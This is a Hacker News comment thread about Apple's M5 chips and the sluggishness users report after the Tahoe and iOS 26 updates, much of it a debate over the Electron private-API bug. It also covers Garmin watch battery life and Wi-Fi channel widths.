mumber_typhoon 20 hours ago

The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

All in all, apple is doing some incredible things with hardware.

Software teams at apple really need to get their act together. The M1 itself is so powerful that nobody really needs to upgrade that for most things most people do on their computers. Tahoe however makes my M1 Air feel sluggish doing the exact same tasks ive been last couple of years. I really hope this is not intentional from Apple to make me upgrade. That would be a big let down.

  • discomrobertul8 2 hours ago

    > Software teams at apple really need to get their act together.

    WatchOS 26 has rendered my Apple Watch almost useless. It's gone from lasting a whole day including 2 cycling 'workouts' for my commute and the occasional lunch time run (or gym session before work) to now being at 40% battery by the time I make my mid-morning coffee and dead before I get home.

    I don't use most of the 'smart' features anyway - I'm mostly using the fitness features - so I'll probably switch to a Garmin at some point.

    • bean469 2 hours ago

      > I don't use most of the 'smart' features anyway - I'm mostly using the fitness features - so I'll probably switch to a Garmin at some point.

      If that's your use case, I can absolutely recommend getting one. I have a Forerunner 745 and it works great for workouts alongside some smart functions like NFC payments, quick-replies to texts, etc. The battery lasts for days as well, which you can't really beat.

      • cdaven 38 minutes ago

        > The battery lasts for days as well, which you can't really beat.

        The Garmin Instinct 2X's (and 3) battery lasts for 40 days in smartwatch mode, not counting the solar charging.

        The Instinct is an "outdoor watch" with a monochrome display, but it has most features the Forerunners have.

        • ansgri 23 minutes ago

          Also it has a proper builtin flashlight which is surprisingly useful. Amazing watch, especially if you get a comfortable aftermarket strap e.g. from Hemsut.

  • kokada 20 hours ago

    > Tahoe however makes my M1 Air feel sluggish doing the exact same tasks ive been last couple of years.

    I have a work provided M2 Pro with 32GB of RAM. After the Tahoe upgrade it feels like one of the sluggish PCs at the house. It is the only one that I can see the mouse teleporting sometimes when I move it fast. This is after disabling transparency in Accessibility settings mind you, it was even worse before.

    • runjake 16 hours ago

      It's probably due to the Electron bug[1]. A lot of common apps haven't patched up yet.

      I also have an M2 Pro with 32GB of memory. When I A/B test with Electron apps running vs without, the lag disappears when all the unpatched Electron apps are closed out.

      1. https://avarayr.github.io/shamelectron/

      Here's a script I got from somewhere that shows unpatched Electron apps on your system:

      Edit: HN nerfed the script. Found a direct link: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...

      • friendzis 3 hours ago

        > It's probably due to the Electron bug[1]. > When I A/B test with Electron apps running vs without, the lag disappears when all the unpatched Electron apps are closed out.

        Look, if userspace apps can break system functionality, to the level that simple mouse cursor is not responsive, it suggests that there is something fundamental broken in the OS.

        Yes, everyone should blame and shame Electron, but here the bug is firmly in the OS.

        • aroman 2 hours ago

          Apparently Electron was using a private API to tweak how window border shadows were rendered.[0] I leave it to you to decide how to assign blame.

          [0] https://github.com/electron/electron/pull/48376

          • friendzis 26 minutes ago

            What's private API?

            If it is accessible from userspace it is by no means private.

            Does it mean the API is private in the sense of "unstable" interface? It could very well break the userspace app relying on undocumented behavior, however, crucially here, anything that is exposed to userland WILL at some point be used by some application, be it legitimate or malicious, and it should not break the OS in any way. That's basic hygiene, not even security.

            inb4: yes, userspace app could trigger e.g. millions of io operations and millions of number crunching threads and thus cripple the rest of userspace (or at least the rest of userspace at given priority level), yet the system part should still run within performance envelope. Insert "Task Manager (Not Responding)" meme.

            • fingerlocks 8 minutes ago

              It’s not in a public header. You can easily snoop “private” properties and methods quite easily in Objective-C, because the concept doesn’t exist. It doesn’t exist in C either, but if you roll up your sleeves and figure out the memory layout and offsets, you can do whatever.

          • sersi an hour ago

            If any apple app uses a private api then that api should be made public and documented. Having private apis is unfair competition and bad practice

            • friendzis 22 minutes ago

              There's no meaningful difference between "private" and "documented, but changing every patch release" from userspace POV, yet not committing to documentation saves development effort for the same result, hence "private" APIs. If anything, private apis let "system" apps run at userspace, reducing attack surface dramatically.

          • biohazard2 an hour ago

            Can we blame the Apple employees who apparently never tested their new OS release with any Electron-based application?

            • rollcat 42 minutes ago

              How else do you get the message across? Do not use the private APIs.

              Electron is most likely using a whole ton more. Apple is sending a message. "Fix your crap or expect more."

              • biohazard2 21 minutes ago

                I can think of multiple ways to pass the message to Electron developers:

                - Open a GitHub issue explaining those private APIs shouldn't be used.

                - Even better, open a PR fixing their use.

                - Make those API calls a no-op if they come from an Electron app.

                - Fix those API calls not to grind the OS to a halt for a seemingly simple visual effect.

                - Create a public API allowing the same visual effect on a tested and documented API.

                Choosing to (apparently violently) downgrade the user experience of all Electron app users, without a possibility to update at the launch day, if a deliberate decision and not an overlooked bug, is a rather shitty and user-hostile move, don't you think?

              • freetanga 23 minutes ago

                ... and in the process we will deteriorate the performance of millions of users and hurt our brand as a top class experience company?

                Don't really care who is to blame, but they should have identified this, and either warn developers, or warn users. Or provide a tool for identifying guilty apps in your machine, and let users decide how to proceed.

            • fragmede an hour ago

              the reason for having a large public beta process would be to get broader testing that definitely should have found this

      • fjarlq 16 hours ago

        Helpful script, except it prints the same line regardless of the version found.

      • tomalbrc 6 hours ago

        Should we not be shaming apple for their recent software releases? Every bit of the os is N times slower than on the previous macOS version. Safari has been unusable. Constant lags and crashes in the shipped browser alone. We are back in Windows Vista times

      • Eric_WVGG 16 hours ago

        unpatched include Asana, Bitwarden, Dropbox… some pretty high-profile apps

        • runjake 14 hours ago

          Yes, and 1Password up until today!

    • speedgoose 19 hours ago

      Do you have a few electron powered apps that didn’t get updated yet?

      Electron used to override a private function that makes the Mac OS sluggish on Tahoe, and apparently no one uses Electron apps while doing testing at Apple.

      • kokada 19 hours ago

        I keep my applications pretty much up-to-date but I didn't check the release notes for each Electron application that I have to make sure they're updated. I still think this is a failure of macOS, since one misbehaving application shouldn't bring the whole environment to slow to a crawl.

        What I can say is that while the situation is much better than at Day 1, the whole Tahoe experience is not as fluid as Sequoia.

        Also, it doesn't really matter to me if this was a private function or not, if this was Windows or Gnome/KDE people would blame the developers of the desktop instead.

        • dylan604 19 hours ago

          It shouldn't be the user's responsibility to know what architecture the software uses to then need to go look at upgrading them. Upstream comments blaming Apple for this for "not testing Electron apps internally", but I don't expect Apple to test every single app ever released for regression testing. Apple releases betas, and the software devs are expected to test their app against it. The problem comes from the app devs using a bit of private code where it is suggested to not do that for this very reason. Even if Apple did test and find the result, it would still be the app dev that would need to fix it. Maybe the thought is that an email from Apple to the dev saying fix your code would more compelling???

          • kokada 18 hours ago

            > Upstream comments blaming Apple for this for "not testing Electron apps internally", but I don't expect Apple to test every single app ever released for regression testing.

            This happens in pretty much every Electron app as far I know, and lots of Electron apps are like Spotify, VSCode or Slack are very likely to be in the Top 10 or at least Top 100 most used apps. And yes, I would expect Apple to test at least the most popular apps before releasing a new version of their OS.

            > Maybe the thought is that an email from Apple to the dev saying fix your code would more compelling???

            Of course not. Apple controls the SDK, they could workaround this in many different ways, for example instead of changing how this function was implemented they could introduce a new method (they're both private so it doesn't matter) and effectively ignore the old method (maybe also they could add a message for developers building their application that this method was removed). It would draw ugly borders in the affected apps but it wouldn't cause this issue at least.

            • wvenable 16 hours ago

              "When developing Windows 95, one manager bought every program available at a local software store..."

              https://www.pcworld.com/article/2816273/how-microsofts-windo...

              • bee_rider 14 hours ago

                That was the 90’s, the QA was harder to do but actually done sometimes.

                • freeAgent 20 minutes ago

                  QA then was taken pretty seriously because, unlike today, they could not just issue a patch over the internet and expect their users to find, download, and install it. Much of the '90s was pre-internet era for many people, and it was certainly before today's world of having auto-updating apps, good search engines, etc.

                • pjmlp 4 hours ago

                  In the 90's we also got to enjoy native apps.

            • dylan604 18 hours ago

              > (maybe also they could add a message for developers building their application that this method was removed)

              why do we think this would be a solve as the devs clearly ignored the previous message about not using a private method?

              • kokada 18 hours ago

                > why do we think this would be a solve as the devs clearly ignored the previous message about not using a private method?

                If anything the fact that devs can actually access private symbols is an issue with how Apple designed their APIs, because they could make this so annoying to do that nobody would try (for example, stripping symbols).

                Also, the fact that devs need to access private symbols to do what they need to do also shows that the public API is lacking at least some features.

                Another thing, if this only affected the app itself that would be fine, but this makes the whole system slow to a crawl.

                So while devs share some of the blame here (and I am not saying they don't), I still think this whole situation is mostly Apple's fault.

                • tedivm 17 hours ago

                  If you actually read the specific bug and use of a private method it really was a stupid decision by one developer awhile ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

                  I think the failures here are that Apple should have tested this themselves and the Electron devs should have tested and resolved this during the beta period.

                  • magicalist 15 hours ago

                    > If you actually read the specific bug and use of a private method it really was a stupid decision by one developer awhile ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

                    I don't think it's that clear cut. It looks like it was a workaround for a MacOS rendering bug going back to at least 2017, landed in 2019 and had no apparent downsides for six years[1].

                    The PR removing the private API code also included someone verifying that Apple had fixed the original bug some time in the intervening years[2].

                    I probably wouldn't have taken this approach personally (at the very least file the original rendering issue with Apple and note it with the code, though everyone knows the likelihood of getting a even a response on an issue like that), but it wasn't some cargo culted fix.

                    [1] https://github.com/electron/electron/pull/20360

                    [2] https://github.com/electron/electron/pull/48376#issuecomment...

                  • conductr 13 hours ago

                    Who’s to say Apple didn’t test it and pushed it out anyway to force the Electron devs hands. It’s their garden and they can move the walls

                    • kokada 13 hours ago

                      This only made Apple look bad, again this is not a bug that make the app slow, it makes the whole system slow.

                      Imagine now that you're a non tech savvy user, that probably doesn't update apps as often, they are probably wondering why "my laptop is so slow after updating". But like I said in other thread, maybe this is on purpose to make people upgrade.

            • 0x457 15 hours ago

              Spotify doesn't use Electron, though. Also, I do not expect Apple to care about Electron because delivering shitty electron experience only benefit their native apps.

              • kokada 14 hours ago

                If anything the ones that got a worse reputation here is Apple itself. The bug basically slow the whole system, not just the application that has the bad behavior.

                Sure, people in Hacker News now know that the issue is "that Electron bug", but I am sure lots of other people that are less tech savvy just kept questioning what the hell is happening and maybe even considered an upgrade. But maybe that is the whole point.

                • NetMageSCW 13 hours ago

                  Seems like the right patch is to just crash any app attempting to use the private API so blame would go where it is deserved. And if it caused a lot of more awareness of the need to get rid of Electron, bonus.

          • sersi an hour ago

            > blaming Apple for this for "not testing Electron apps internally", but I don't expect Apple to test every single app ever released for regression testing.

            Given how high profile the impacted app are, yes it's their responsibility to test it. Even Microsoft does better there (or at least used to). Contacting electron and finding a solution would have been an easy step to take

          • danudey 12 hours ago

            It seems as though a lot of arguments about this boil down to a few inane implications:

            1. Apple should test every (common?) app and any change to the OS that they make that makes an app worse shouldn't be done regardless of why they wanted to make that change. 2. Even though Apple tells people not to use private APIs, if a program uses a private API anyway Apple should build a workaround into their OS instead of letting apps suffer their own repercussions. 3. Apple should test everything ahead of time and then go around telling all the app developers that there's a problem, as if those app developers are going to do anything about it.

            No matter what Apple did here, their actual choices boiled down to:

            1. Add workarounds for misbehaving broken apps, giving those apps no incentive to fix their issues, and forcing Apple to support those workarounds indefinitely; this also undermines their "don't use private APIs, they could break later" position. This is the kind of thing that made Windows into an unmaintainable sack of cruft.

            2. Do what they did, which is change the API and let broken apps be broken to the user's detriment. Everyone blames Apple even though it's objectively not their fault.

            2. Add some kind of non-workaround that caused problems for the app and not the user; e.g. have this private API rate limited or something so that the app ends up blocking in the call. Could cause problems for actual consumers of this API, and people would still blame Apple but in this case it would be more of their fault than option 2.

            In the end, Apple can't spend their time fretting over what bad developers do wrong; they spend their time on their OS and software and if a developer writes bad software and causes problems then so be it.

            • mcculley 36 minutes ago

              Apple really should investigate why so many popular apps are implemented using Electron. Is it that hard to use the native APIs now? If so, Apple needs to improve the native application development experience. The UX on these apps is terrible and should be embarrassing for all involved.

            • sunshowers 5 hours ago

              I think testing the top 10 projects in a few verticals is a pretty reasonable thing. For my open source projects I do this kind of basic QA against their top users.

              Then the bugs could be reported to the various app developers, and they would have been able to get some notice. Many would have acted on it. Many of the top apps have dedicated Apple contacts already. Seems like a completely reasonable expectation?

        • speedgoose 19 hours ago

          Yes I think Apple is to blame there. Electron is so prominent that they should have detected the problem and found a solution well before the general release.

          • danudey 12 hours ago

            Apple releases betas of their OS specifically so that developers can try their apps on them. macOS is so prominent that Electron-using developers should have detected the problem and found a solution well before the general release.

            • rock_artist 4 hours ago

              Well, I personally know of cases Apple did explicit patching for specific apps to keep them working / avoid breaking.

              My simple guess is that slipped QA or wasn’t escalated from Apple’s feedback.

              Considering the amount of electron apps, expecting all developers and all users to update all their app (and guessing which one is Electron based) isn’t good user-experience.

              Let’s say the change is needed in the OS, you’d expect transition time. Also, a good UX on OS would be to notify user this app is using some API in a way that could reduce experience. but guessing and expecting only the developer and user parties without the OS side is making less sense imho.

            • ryukoposting 4 hours ago

              I don't do desktop applications professionally (firmware is my thing) but I would balk at the suggestion that I should run a beta OS on the machine that pays my rent.

              What portion of, say, Slack devs actually run a MacOS beta at work? Are they regular devs, or are they in QA/test? It seems to me like the latter is the far more appropriate team for this.

            • bambax 3 hours ago

              If the result of this policy is that users think Apple products are crap, then it's probably counter-productive for Apple, no?

          • wrs 14 hours ago

            Apple just doesn’t work that way, and hasn’t since I worked there in the 90s. Private APIs are out of bounds. It’s like a “the FBI doesn’t negotiate with kidnappers” situation.

            • makeitdouble 11 hours ago

              > "the FBI doesn’t negotiate with kidnappers”

              Welp

              https://leb.fbi.gov/articles/featured-articles/fifty-years-o...

              Apple's private API situation was also much more nuanced, back in the days if Adobe was using an API, private or not, it probably wouldn't be degraded in any way until the core applications moved forward. Current Apple might not give a damn though.

              • wrs 7 hours ago

                Yeah true, there was a period when they couldn’t really afford to annoy the big developers. But it doesn’t seem like the underlying attitude changed much!

          • IMTDb 17 hours ago

            So now you can disregard the notion of "private function" if you pass 100k stars on GitHub ?

            • javawizard 16 hours ago

              There's definitely a line of thinking that would say "yes": https://www.hyrumslaw.com/

              • 0x457 15 hours ago

                Sure, someone will depend on it, we all ignored "private" vs "public" at least once. Okay to do and okay to be mad when your thing breaks because you decided to depend on it? Nope.

                • Dylan16807 14 hours ago

                  Okay to be mad the OS vendor didn't do anything to help when the users are the ones that face the fallout? Yes.

                  Even if you disqualify the devs from being mad, everyone else gets to be mad.

                  • 0x457 13 hours ago

                    Vendor did help...marked function as private. I view this specific incident as another argument against electron, so I'm biased.

                    • Dylan16807 13 hours ago

                      That's a good initial step. But once it got put on a zillion computers, there should have been additional mitigation steps.

                      In an ideal situation, they would have noticed the widespread use of this private function a long time ago, put a note on the bug report that it works around, and after they fixed the bug they would have reached out to electron to have them remove that access.

                      • javawizard 12 hours ago

                        Exactly. As they say: if you owe the bank $100, that's your problem; if you owe the bank $100 million, that's the bank's problem.

            • ruined 16 hours ago

              all APIs are public APIs

              • NetMageSCW 13 hours ago

                Only if you don’t care about your users or your apps reputation. Of course, if you are using Electron those ships have already sailed.

      • placatedmayhem 19 hours ago

        The check script I've been recommending is here:

        https://github.com/tkafka/detect-electron-apps-on-mac

        About half of the apps I use regularly have been fixed. Some might never be fixed, though...

        • EasyMark 19 hours ago

          wasn't there a workaround for those apps that might not ever get updated? I thought I saw something on reddit. Some config change

      • EasyMark 19 hours ago

        This is why I stay on previous release until at least 0.2 or 0.3 to let them work out the bugs so I dont' have to deal with them, there was nothing in 26 that felt pressing to me that I would need to update

        • abustamam 17 hours ago

          Tbh I'm purposely not updating because I'm not in love with the new ~Aero~ glass UI.

      • pjmlp 4 hours ago

        WWDC keynote on the state of the nation was quite clear on what Apple thinks about Electron and related stuff like React Native.

        Hence I am not surprised that they ignore their existence.

      • michelb 17 hours ago

        The OS and stock apps are much slower in Tahoe even. And the UI updates/interactions are also slower. I’m lucky I only upgraded my least used machine, and that’s a well stocked M2.

        • astrange 16 hours ago

          It should not be slower. File a report in Feedback Assistant.

      • nikanj 16 hours ago

        Or more likely nobody gives a damn about performance while doing testing.

    • kobalsky 19 hours ago

      my tinfoil-hat theory is that on each OS iteration Apple adds a new feature that leverages the latest chips hardware acceleration features and for older chips they do software-only implementations.

      they ship-of-thesseus the crap out of their OS but replacing with parts that need these new hardware features that run slow on older chips due to software-only implementations.

      I got the first generation iPad Pro, which is e-waste now, but I use it as a screen for my CCTV, it cannot even display the virtual keyboard without stuttering like crazy, it lags switching apps, there's a delay for everything, this thing was smooth as butter on release.

      • thewebguyd 19 hours ago

        I have the 4th gen (2020) iPad Pro with the A12X Bionic, the same chip they put in the Apple Silicon transition dev kits. With iPadOS 26 it's become barely usable, despite still being performant as ever on iPadOS 18. I'm talking huge drop in performance, stutters and slow downs everywhere.

        I was considering just replacing the battery and keeping it for several more years but now I feel forced to upgrade which has me considering whether I still want/need an iPad since I'd also have to buy a new magic keyboard since they redesigned it, and they bumped the price ($1299 now vs. $999 when I got the 4th gen) so I'd be looking at $1700. Trying to hold out for an iPad Air with ProMotion.

        I may be in the minority here, but I think 5 years is too short of a lifespan for these devices at this point. Early days when things were advancing like crazy, sure. But now? I have 8 year old computers that are still just fine, and with the M-series chips I'd expect at least 10 years of usable life at minimum (battery not withstanding)

        • qingcharles 19 hours ago

          That's weird. I have an 8th Gen iPad, the slowest device that can run iPadOS 26, and everything is fine on that old thing. (except the OS takes up the majority of the storage)

          • techstrategist 15 minutes ago

            weird, my iPaid Air 3 which should have the same specs has been really for at least a year. Plenty of free storage, not so many apps, all visual enhancements turned off.

          • thewebguyd 18 hours ago

            Interesting. Might try a factory reset then and see. There's noticable lag for me, it's especially slow when switching apps or bringing up the keyboard, as well as on first unlock. Interacting within a single app is still fine, it's interacting with the OS that's really sluggish.

            • NetMageSCW 13 hours ago

              How long have you been running on 26? Every iOS/iPadOS update takes a few days to stabilize.

            • gosub100 16 hours ago

              Total guess but is there a tiny fan inside that got filled with dust? Maybe it's thermal throttling.

              • sgerenser 15 hours ago

                Apple has never made an iPad with a fan

          • dwood_dev 16 hours ago

            8th Gen iPad is about the same on iPadOS 26 as 18 for me, which is slow. The 32GB really handicapped it for even being usable as to even upgrade it, I have to factory reset it first. I'm replacing it with a Mini.

            The iPad Air 13 with a M3 is a really nice experience. Very fast device.

        • cgh 7 hours ago

          I have a 3rd Gen iPad Pro from 2018 and iPadOS 26 runs fine.

      • trinix912 15 hours ago

        Plus they don't let you downgrade to previous iOS versions on iPhones and iPads (unless you've been smart to save SHSH blobs and all that) so the only option to revert to a smooth version now is to download a sketchy jailbreak.

        • 05 3 hours ago

          > A12 devices and newer

          > You cannot restore to any iOS versions other than signed ones. All SHSH blobs are currently useless.

          So, anything newer than iPhone X can’t be downgraded

      • osn9363739 11 hours ago

        At some point you have to use the new features available to you. That's not really tinfoil, just progress, and how all tech works no.

        • setopt 11 hours ago

          They could choose to not offer the new feature to users on old hardware, but still provide those platforms with e.g. security updates and key features like Safari upgrades.

        • behnamoh 7 hours ago

          this couldn't be farther from the truth. people still use vim and it's better than most new tech that was made post 2000s.

    • prettyblocks 16 hours ago

      I'm on an M2 with 24GB ram and it feels like it flies as fast as ever.

    • ExoticPearTree 19 hours ago

      26.0.1 fixed the sluggishness. 26.0 was pretty unstable - felt like a game dropping frames.

      • kokada 19 hours ago

        26.0.1 is better, but I can still get sluggishness in a few specific cases.

        I just got one example while passing the mouse quickly through my dock (I still use the magnify animation) and I can clearly see it dropping a few frames. This never happened in macOS 15.

    • Angostura 16 hours ago

      I don't get this - I have an M1 iMac - haven't noticed much difference.

    • jen20 8 hours ago

      > work provided

      I too have a work-provided laptop and a personal one bought the same month, with identical specs (the only difference is the US vs UK keyboard layout). The work-provided one is at least an order of magnitude slower to do anything thanks to enterprise crapware.

    • tsunamifury 17 hours ago

      Transparency disabling ads anothe draw layer that is opaque on top making it even worse than when it’s on

      • array_key_first 13 hours ago

        If they developed it in the most naive and stupid way imaginable, sure. If we're assuming Apple isn't filled with 3rd year comp sci students, then no.

        • tsunamifury 10 hours ago

          HAHA this is where HN has become delusional. It quite literally is the implementation, they've checked the render pipeline on reddit. Jesus the arrogance here is so shit.

  • xz0r an hour ago

    I've seen every new OS update leading to M1 Air performance degrade, at this point I'm pretty convinced Apple is doing this intentionally.

    Edit: Same experience with iPhone X

    Edit2: I still remember the feeling when I got them initially - that Apple is on customer's side, but now I feel totally helpless and i'm being forced to upgrade

    • noname120 an hour ago

      I haven’t noticed this to be honest: macOS 26 Tahoe is the first update that significantly hindered the performances of my MacBook Air M1. Even with the Electron _cornerMask fix + disabling auto heuristics at the OS level.

  • SkyPuncher 18 hours ago

    There are so many software related things that drive me absolutely loony with Apple right now.

    * My iPhone as a remote for my Apple TV has randomly stopped deciding it can control the volume - despite the "Now Playing" UI offering an audio control that works.

    There auth screens drive me crazy:

    * Why cannot I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't gong to work, stop making me wait.

    * Likewise, on Apple TV the parental control input requires me to explicitly choose to enter a Pin Code. Why? Just show me the Pin Code screen. If I can approve from my device, I will.

      * Similarly, if I use my phone as a remote, why do I need to manually click out of the remote to get to the parental control approval screen. I'm literally using my phone. Just auto-approve.
    • strbean 17 hours ago

      > * Why cannot I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't gong to work, stop making me wait.

      Funny, a similar thing has been driving me crazy on my Ubuntu 20.04 laptop with fingerprint login. When unlocking, I can either enter a password or use fingerprint. On boot, I am not allowed to enter a password until I fail with fingerprint. If I use fingerprint to log in on boot, I have to enter my password anyways once logged in to unlock my keychain.

      I should probably just figure out a way to disable fingerprint on boot and only use it for the lock screen.

    • sample2 16 hours ago

      I see the same bug with the remote on my phone, how did they manage to break volume control in the app while keeping it working from the lock screen “now playing”?

      I’ve also been unable to get the remote app on my watch to work at all. It’s hard to imagine people working at Apple don’t also run into these issues all the time.

    • sotix 17 hours ago

      Why can I not use my password manager for my Apple ID but can use it for any other password field? Instead I have to switch to my password manager, copy the password, reopen the App Store, select get app, and paste the password in the Apple ID login pop up in the 10 seconds before my password clears from my clipboard.

      • mschuster91 16 hours ago

        Been ages but I think you can mitigate that annoyance by approving fingerprint purchases.

        • sotix 12 hours ago

          It requires a password to enable Touch ID whenever you restart your phone. For security reasons, the iPhone automatically restarts every few days. So I run into this issue regularly.

    • okrad 6 hours ago

      The volume on iPhone when being used as remote seems to work of you use the hardware buttons. It’s not intuitive at all but it works

    • gxs 17 hours ago

      As someone who jumped in the apple bandwagon at peak apple and hasn’t been through all their ups and downs the way some die hards have been, it’s been super aggravating dealing with apples shit lately - not what I signed up for all those years ago

      It seems to have been degrading for a long time, but for me it’s been in this past year where it’s crossed into that threshold android used to live in where using the phone causes a physiological response from how aggravating it can be sometimes

      I let my guard down and got too deep into the apple ecosystem- I know better and always avoided getting myself into these situations in the last, but here I am

      The phone sucks right now - super buggy and they continue to remove/impose features that should be left as an option to the user By Yes, this has always been the knock on apple, but I typically havent had an issue with their decisions - it’s just so bad now

      Lesson (re)learned and I will stay away from ecosystems - luckily the damage here is only for media

      The minute I can get blue bubbles reliably on an android, I’ll give the pixel a shot again - if that sucks too then maybe I’ll go back to my teenage years and start rooting devices again

      • SkyPuncher 16 hours ago

        So, I still think the experience is generally better and more integrated than when I was on an Android device. I just find they're generally not really paying attention to user details the way they have in the past.

      • skinnymuch 16 hours ago

        How would you ever get blue bubbles reliably on Android? Are you talking about iMessage or something else?

        I am fully bought into the Apple ecosystem. Not sure yet if I regret it. It is annoying to be so tied down to one company that isn’t going the way I want it to.

        • gxs 14 hours ago

          Yeah iMessage - over the years there have been “breakthroughs” - people find nifty workarounds or have even reverse engineered the iMessage protocol, but for whatever reason nothing ever sticks

          There are current workarounds, like isn’t your home Mac as a relay, but nothing super elegant that I know of

    • sgt 17 hours ago

      I highly recommend the Apple remote .. then you also don't need to take your phone with you when you are watching TV, which is an added benefit for some.

      Of course the thin Apple remote has a way of getting lost, but it has a Find Me feature which locates it pretty well.

      • SkyPuncher 16 hours ago

        Remote is fine, but it's always stuck in a couch cushion.

        • K7PJP 15 hours ago

          There was a company or two that made cases for the older Apple remotes with the express purpose of making them larger, which I always thought was kind of funny. I would buy one for the current remote if one existed.

        • sgt 16 hours ago

          Same here.. so we use that Find Remote functionality about once a month! Without it we'd be lost. Business idea: Make a cover for the Apple remote that makes it bigger and harder to lose.

  • port11 15 hours ago

    It's incredible what the hardware teams at Apple have been doing. I imagine they also feel let down by the software that's driving these beasts. It's as if they're 2 completely different companies.

    • kenjackson 15 hours ago

      The latest iPhone OS (iOS 26) is embarrassing. The number of glitches and amount of UI sloppiness is crazy for a company that historically prided itself on the details. It's the first major iOS update I've taken that just seems almost strictly worse than its predecessor.

      • paweladamczuk 14 hours ago

        I remember using my first Apple product years ago, it was an iPod touch 4th gen. The quality of the software on that thing was in a completely different league compared to anything I had used before.

        I also installed the iOS 26 update recently. The competitive advantage of software polish that Apple had seems totally gone.

        Add to that bugs in iCloud, AirDrop... I don't think I will be buying any more Apple devices for myself.

        • 0xWTF 6 hours ago

          What line of laptops is in the same league as the MacBook Pro?

      • kossTKR 14 hours ago

        A small silver lining is if the worlds largest company can ship complete garbage like this don't feel bad about your own small mistakes. I mean i've hotfixed and done my fair share of production reverts - but never, never anything as bad as this.

        Disclaimer, i actually like a bit of "bling", but both Tahoe and IOS so filled with glitches and errors, while the UX is bizarrely inconsistent it really is catastrophically bad.

      • georgel 14 hours ago

        This feels more like a repeat of iOS7 to me.

        • Andrew_nenakhov 5 hours ago

          iOS 7 was the first version of iOS that looked good. Its release was far better and stable be than this liquid glass thing.

      • whimsicalism 11 hours ago

        i've never had such a major downgrade as this one

    • fragmede 44 minutes ago

      In the case of Microsoft and Intel, they were. Vertical integration is Apples claim to fame, but apparently, it has its limits.

  • artk42 38 minutes ago

    > I really hope this is not intentional from Apple to make me upgrade. That would be a big let down.

    I've got a reference macbook air from 2015, which is almost clean, only zoom, teams and chrome for meets are installed and used for calls. And boy, how do I regret making macOS updates.. I can believe teams and zoom are shitbags of modern software slop, and thus started to fail running simple video calls. But even native macOS apps that are barely updated for years like notes and calendar are freezing now. So I can conclude that these anti-backward compatibility updates are highly intentional, because hardware is absolutely fine for decade, i even used this ultra-tiny air for travel work once back in 2022, it was still capable to do all office things and thin client. But last year it just turned into pumpkin.

    My question is - maybe installing linux can help bring it back to life.

  • nofunsir 5 hours ago

    Before the whole "batterygate" thing[1], there were forums and discussions on macrumors and similar inquiring about the feasibility of inserting no-op codes deep below the kernel that would kick in under certain conditions. Post-batterygate, you can't find anything NOT about batterygate when searching.

    1] Which I still firmly believe WAS indeed a power-supply design failure that would have forced a massive hardware recall had they not done something (slowing down the os). I believe it encompassed everything from inaccurate CPU power estimates to something actually incorrect with the PCB design, causing brown outs - and not merely a battery-aging red herring as is the reported scandalous reason they were "caught". In fact, I think Apple is GLAD that all it amounted to was some philosophical hullabaloo about protecting your poor aging battery.

    To clarify, I suspect the "aging battery" merely exposed the real issue - the incorrect PS design - which Apple successfully covered up.

  • greg5green 16 hours ago

    >The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

    Is that good? Their cellular modems have been terrible. I'll reserve judgement until trying one out.

    >The M1 itself is so powerful

    I think this is a bit of a fallacy. Apple Silicon is great for the power consumption to power ratio, but something like a Ryzen 9 7945HX can do 3x more work than an M1 Max. And a non-laptop chip, like an Intel Core Ultra 7 265k can do 3.5x.

  • eboynyc32 5 hours ago

    I think Tahoe is great on my m1 studio. It’s the first os update in a long time that I actually like. The new design feels very futuristic. And I think I’ll get an m5 MacBook Air. There no better computer deal . Even my m1 computer 5 year old still never has any issue with video or render. It’s insane.

  • RataNova an hour ago

    And it kind of defeats the purpose of having such powerful hardware if the OS isn't keeping up (or worse, actively throttling older devices)

  • mcculley an hour ago

    Does this mean that the MacBook Pro still has no option for a cellular modem?

  • kwanbix 16 hours ago

    I really wish apple sold the Mx to others like Lenovo.

    I would love to se a ThinkPad with an M5 running Linux.

    • tomekf 2 hours ago

      There are very nice Thinkpads running on Snapdragon now. But no Linux is available…

    • fph 16 hours ago

      What is the Linux experience on new Mac hardware? I'd be interested also in running a Macbuntu.

      • bmdhacks 16 hours ago

        Asahi linux is essentially in a holding pattern with only support up to M2. Likely linux will never be supported above M2 and even M2 has a lot of rough edges. When my monitor sleeps on M2 linux it can never reawaken without a reboot.

  • ksec 20 hours ago

    The Broadcom WiFi support 320Mhz while N1 is stuck with 160Mhz. There were report of N1 not supporting 4096 QAM as well but I didn't check.

    • ExoticPearTree 19 hours ago

      > The Broadcom WiFi support 320Mhz while N1 is stuck with 160Mhz.

      I was at a Wi-Fi vendor presentation a while back and they said that 160 Mhz is pretty improbable unless you're leaving alone and no wireless networks around you. And 320 Mhz even less so.

      In real life probably the best you can get is 80 Mhz in a really good wireless environment.

      • shadowpho 18 hours ago

        For which band? I run 160/160 on 5/6ghz and it’s nice. They are short range enough to work. For 2.4 yeah 20mhz only

        • greg5green 16 hours ago

          For 5ghz, that's a pretty unusual. You need to be somewhere where DFS isn't an issue to even get 160mhz.

          For 6ghz? Yeah, not uncommon.

      • amluto 19 hours ago

        I would believe that MLO or similar features could make it a bit more likely that large amounts of bandwidth would be useful, as it allows using discontiguous frequencies.

        WiFi does currently get anywhere near the bandwidth that these huge channels advertise in realistic environments.

        • astrange 16 hours ago

          OFDMA also makes it more useful, but I don't know if vendors actually use that in practice.

          • ksec 7 hours ago

            Given that they had WiFi 6 as trial I expect WiFi 7 to have it ironed out for OFDMA. And MLO to be not working until WiFi 8.

      • mrtesthah 16 hours ago

        Indeed, in any relatively dense setting no one should even think about using channels that wide. Think about the original problem with 2.4ghz 802.11b/g: there were only three non-overlapping channels, so you had interference no matter where you went. Why would we want to return to that hell?

        • 0x457 14 hours ago

          My limited experience:

          2.4Ghz is pretty much only used by IoT, you generally don't care about channel width there. When your client device (laptop, phone) downgrades to 2.4Ghz it might as well disconnect because it's unusable.

          5Ghz get stopped by a drywall, so unless your walls are just right to bounce off single, you need AP in every room. Ceiling mounting is pretty much required and you're pretty much free to use channels as wide as your device support and local laws allow.

